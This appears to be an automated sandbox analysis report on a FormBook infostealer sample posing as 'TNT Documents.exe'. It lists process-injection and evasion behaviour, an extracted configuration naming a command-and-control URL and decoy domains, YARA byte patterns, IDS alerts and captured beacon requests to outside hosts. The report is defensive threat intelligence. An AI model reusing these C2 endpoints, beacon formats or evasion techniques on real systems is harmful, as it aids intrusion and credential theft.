Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report TNT Documents.exe

Overview

General Information

Sample Name:TNT Documents.exe
Analysis ID:532859
MD5:f943d9ee79559042bfff9b4e55270cfa
SHA1:7dca5c03f55ab6cbebd6bb3a8203d5c1d7516567
SHA256:2c26343342361efe4ada7dd077f832792eb77f184ec9a6c5b8c3a8ad35dd5aaa
Tags:exeFormbookTNT
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • TNT Documents.exe (PID: 4548 cmdline: "C:\Users\user\Desktop\TNT Documents.exe" MD5: F943D9EE79559042BFFF9B4E55270CFA)
    • TNT Documents.exe (PID: 6400 cmdline: {path} MD5: F943D9EE79559042BFFF9B4E55270CFA)
      • explorer.exe (PID: 3292 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • mstsc.exe (PID: 6268 cmdline: C:\Windows\SysWOW64\mstsc.exe MD5: 2412003BE253A515C620CE4890F3D8F3)
          • cmd.exe (PID: 1148 cmdline: /c del "C:\Users\user\Desktop\TNT Documents.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.floridanratraining.com/how6/"], "decoy": ["wealthcabana.com", "fourfortyfourcreations.com", "cqqcsy.com", "bhwzjd.com", "niftyfashionrewards.com", "andersongiftemporium.com", "smarttradingcoin.com", "ilarealty.com", "sherrywine.net", "fsecg.info", "xoti.top", "pirosconsulting.com", "fundapie.com", "bbgm4egda.xyz", "legalfortmyers.com", "improvizy.com", "yxdyhs.com", "lucky2balls.com", "panelmall.com", "davenportkartway.com", "springfieldlottery.com", "pentagonpublishers.com", "icanmakeyoufamous.com", "40m2k.com", "projectcentered.com", "webfactory.agency", "metronixmedical.com", "dalingtao.xyz", "functionalsoft.com", "klopert77.com", "cortepuroiberico.com", "viavelleiloes.online", "bamedia.online", "skolicalunjo.com", "kayhardy.com", "excellentappraisers.com", "sademakale.com", "zbycsb.com", "empirejewelss.com", "coached.info", "20215414.online", "dazzlehide.com", "swickstyle.com", "specialtyplastics.online", "noordinarysenior.com", "bluinfo.digital", "chuxiaoxin.xyz", "adwin-estate.com", "girlwithaglow.com", "auctions.email", "topekasecurestorage.com", "mountain-chicken.com", "lhdtrj.com", "mhtqph.club", "solatopotato.com", "mecitiris.com", "hotrodathangtrungquoc.com", "gapteknews.com", "mantraexchange.online", "cinematiccarpenter.com", "wozka.xyz", "car-tech.tech", "jssatchell.media", "joyokanji-cheer.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x46c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x41b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x47c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0xac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x6ae9:$sqlite3step: 68 34 1C 7B E1
    • 0x6bfc:$sqlite3step: 68 34 1C 7B E1
    • 0x6b18:$sqlite3text: 68 38 2A 90 C5
    • 0x6c3d:$sqlite3text: 68 38 2A 90 C5
    • 0x6b2b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x6c53:$sqlite3blob: 68 53 D8 7F 8C
    0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x46c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x41b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x47c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x9bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0xac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 29 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      7.2.TNT Documents.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        7.2.TNT Documents.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        7.2.TNT Documents.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x15ce9:$sqlite3step: 68 34 1C 7B E1
        • 0x15dfc:$sqlite3step: 68 34 1C 7B E1
        • 0x15d18:$sqlite3text: 68 38 2A 90 C5
        • 0x15e3d:$sqlite3text: 68 38 2A 90 C5
        • 0x15d2b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15e53:$sqlite3blob: 68 53 D8 7F 8C
        7.0.TNT Documents.exe.400000.8.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          7.0.TNT Documents.exe.400000.8.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 16 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.floridanratraining.com/how6/"], "decoy": ["wealthcabana.com", "fourfortyfourcreations.com", "cqqcsy.com", "bhwzjd.com", "niftyfashionrewards.com", "andersongiftemporium.com", "smarttradingcoin.com", "ilarealty.com", "sherrywine.net", "fsecg.info", "xoti.top", "pirosconsulting.com", "fundapie.com", "bbgm4egda.xyz", "legalfortmyers.com", "improvizy.com", "yxdyhs.com", "lucky2balls.com", "panelmall.com", "davenportkartway.com", "springfieldlottery.com", "pentagonpublishers.com", "icanmakeyoufamous.com", "40m2k.com", "projectcentered.com", "webfactory.agency", "metronixmedical.com", "dalingtao.xyz", "functionalsoft.com", "klopert77.com", "cortepuroiberico.com", "viavelleiloes.online", "bamedia.online", "skolicalunjo.com", "kayhardy.com", "excellentappraisers.com", "sademakale.com", "zbycsb.com", "empirejewelss.com", "coached.info", "20215414.online", "dazzlehide.com", "swickstyle.com", "specialtyplastics.online", "noordinarysenior.com", "bluinfo.digital", "chuxiaoxin.xyz", "adwin-estate.com", "girlwithaglow.com", "auctions.email", "topekasecurestorage.com", "mountain-chicken.com", "lhdtrj.com", "mhtqph.club", "solatopotato.com", "mecitiris.com", "hotrodathangtrungquoc.com", "gapteknews.com", "mantraexchange.online", "cinematiccarpenter.com", "wozka.xyz", "car-tech.tech", "jssatchell.media", "joyokanji-cheer.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: TNT Documents.exeReversingLabs: Detection: 46%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.2.TNT Documents.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.TNT Documents.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.TNT Documents.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.TNT Documents.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.TNT Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.TNT Documents.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.TNT Documents.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.361357634.00000000014F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.361164513.00000000010D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.524461205.0000000003A60000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.290851774.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.289769088.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp, type: MEMORY
          Antivirus detection for URL or domainShow sources
          Source: http://www.specialtyplastics.online/how6/?iN9tFB=xCGPRvAkK+xY+IPwAFenqNjQ2EZcc1A/OJpQ1mtXoxRJ135kHr2e9wYqnwHz38WooRcfQb4d5g==&4h=7n_DRJGxnRdAvira URL Cloud: Label: malware
          Source: http://www.cortepuroiberico.com/how6/?iN9tFB=6MRiWtHRwAFwDvhVcJAGZD0p4fLcIEcyVDy1Zth0WcmsI64tqWfeZe6Y2j9BcQs7bzR6A9198A==&4h=7n_DRJGxnRdAvira URL Cloud: Label: malware
          Machine Learning detection for sampleShow sources
          Source: TNT Documents.exeJoe Sandbox ML: detected
          Source: 7.2.TNT Documents.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.0.TNT Documents.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.0.TNT Documents.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.0.TNT Documents.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: TNT Documents.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: TNT Documents.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: TNT Documents.exe, 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, TNT Documents.exe, 00000007.00000002.361759586.000000000164F000.00000040.00000001.sdmp, mstsc.exe, 00000011.00000002.524903670.0000000005590000.00000040.00000001.sdmp, mstsc.exe, 00000011.00000002.525561940.00000000056AF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: TNT Documents.exe, TNT Documents.exe, 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, TNT Documents.exe, 00000007.00000002.361759586.000000000164F000.00000040.00000001.sdmp, mstsc.exe, mstsc.exe, 00000011.00000002.524903670.0000000005590000.00000040.00000001.sdmp, mstsc.exe, 00000011.00000002.525561940.00000000056AF000.00000040.00000001.sdmp
          Source: Binary string: mstsc.pdbGCTL source: TNT Documents.exe, 00000007.00000002.362758177.0000000003400000.00000040.00020000.sdmp
          Source: Binary string: mstsc.pdb source: TNT Documents.exe, 00000007.00000002.362758177.0000000003400000.00000040.00020000.sdmp
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4x nop then pop edi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49794 -> 51.255.30.106:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49794 -> 51.255.30.106:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49794 -> 51.255.30.106:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49820 -> 119.18.54.99:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49820 -> 119.18.54.99:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49820 -> 119.18.54.99:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49822 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49822 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49822 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49827 -> 158.69.116.156:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49827 -> 158.69.116.156:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49827 -> 158.69.116.156:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.metronixmedical.com
          Source: C:\Windows\explorer.exeDomain query: www.specialtyplastics.online
          Source: C:\Windows\explorer.exeNetwork Connect: 51.255.30.106 80
          Source: C:\Windows\explorer.exeNetwork Connect: 119.18.54.99 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeDomain query: www.cortepuroiberico.com
          Source: C:\Windows\explorer.exeNetwork Connect: 209.17.116.163 80
          Source: C:\Windows\explorer.exeDomain query: www.coached.info
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.floridanratraining.com/how6/
          Source: Joe Sandbox ViewASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
          Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
          Source: global trafficHTTP traffic detected: GET /how6/?iN9tFB=6MRiWtHRwAFwDvhVcJAGZD0p4fLcIEcyVDy1Zth0WcmsI64tqWfeZe6Y2j9BcQs7bzR6A9198A==&4h=7n_DRJGxnRd HTTP/1.1Host: www.cortepuroiberico.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /how6/?iN9tFB=xCGPRvAkK+xY+IPwAFenqNjQ2EZcc1A/OJpQ1mtXoxRJ135kHr2e9wYqnwHz38WooRcfQb4d5g==&4h=7n_DRJGxnRd HTTP/1.1Host: www.specialtyplastics.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /how6/?iN9tFB=eO7AK5UTSuqTcoXAE4JKPt5tOBv6nnmPk0M2G0ISpIO4jWwGwHlgDwMnGXB5SfKol3UegXCZpg==&4h=7n_DRJGxnRd HTTP/1.1Host: www.metronixmedical.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /how6/?iN9tFB=ViiEyPWfYSojbIItq3CvR44gsAi5K3j61FSCtvXBJNhPIgkqJAzuFuyRGTnTAJ9C7DX1GVbTZg==&4h=7n_DRJGxnRd HTTP/1.1Host: www.coached.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 209.17.116.163 209.17.116.163
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 02 Dec 2021 17:59:48 GMTContent-Type: text/htmlContent-Length: 275ETag: "61a4f026-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.256409196.00000000054AD000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: TNT Documents.exe, 00000000.00000003.256409196.00000000054AD000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.comx
          Source: TNT Documents.exe, 00000000.00000002.294032469.0000000002381000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 0000000B.00000000.339769433.0000000006840000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.319305560.0000000006840000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.302126756.0000000006840000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/
          Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: TNT Documents.exe, 00000000.00000003.264583046.000000000548D000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264654507.000000000548D000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264398711.000000000548D000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/
          Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265542932.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265913845.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265491333.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265612150.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265991532.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265777624.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265683380.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265846476.0000000005482000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designerss
          Source: TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com=
          Source: TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comF(
          Source: TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comI.TTF
          Source: TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comals
          Source: TNT Documents.exe, 00000000.00000003.292077416.0000000005470000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000002.299918720.0000000005470000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comcomo?
          Source: TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comd
          Source: TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comitud
          Source: TNT Documents.exe, 00000000.00000003.292077416.0000000005470000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000002.299918720.0000000005470000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.como
          Source: TNT Documents.exe, 00000000.00000003.256191173.00000000054AD000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: TNT Documents.exe, 00000000.00000003.256034110.00000000054AD000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.256133822.00000000054AD000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.255970673.00000000054AD000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.256207995.00000000054AD000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.256191173.00000000054AD000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.comX
          Source: TNT Documents.exe, 00000000.00000003.258709539.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.258597321.0000000005474000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.c
          Source: TNT Documents.exe, 00000000.00000003.257969438.0000000005473000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.258199310.0000000005481000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.258119764.0000000005481000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.257895168.0000000005473000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: TNT Documents.exe, 00000000.00000003.257969438.0000000005473000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnG
          Source: TNT Documents.exe, 00000000.00000003.257969438.0000000005473000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.257895168.0000000005473000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cna
          Source: TNT Documents.exe, 00000000.00000003.257895168.0000000005473000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnaX
          Source: TNT Documents.exe, 00000000.00000003.258154475.0000000005481000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.258083706.0000000005481000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.258199310.0000000005481000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.258119764.0000000005481000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnar
          Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
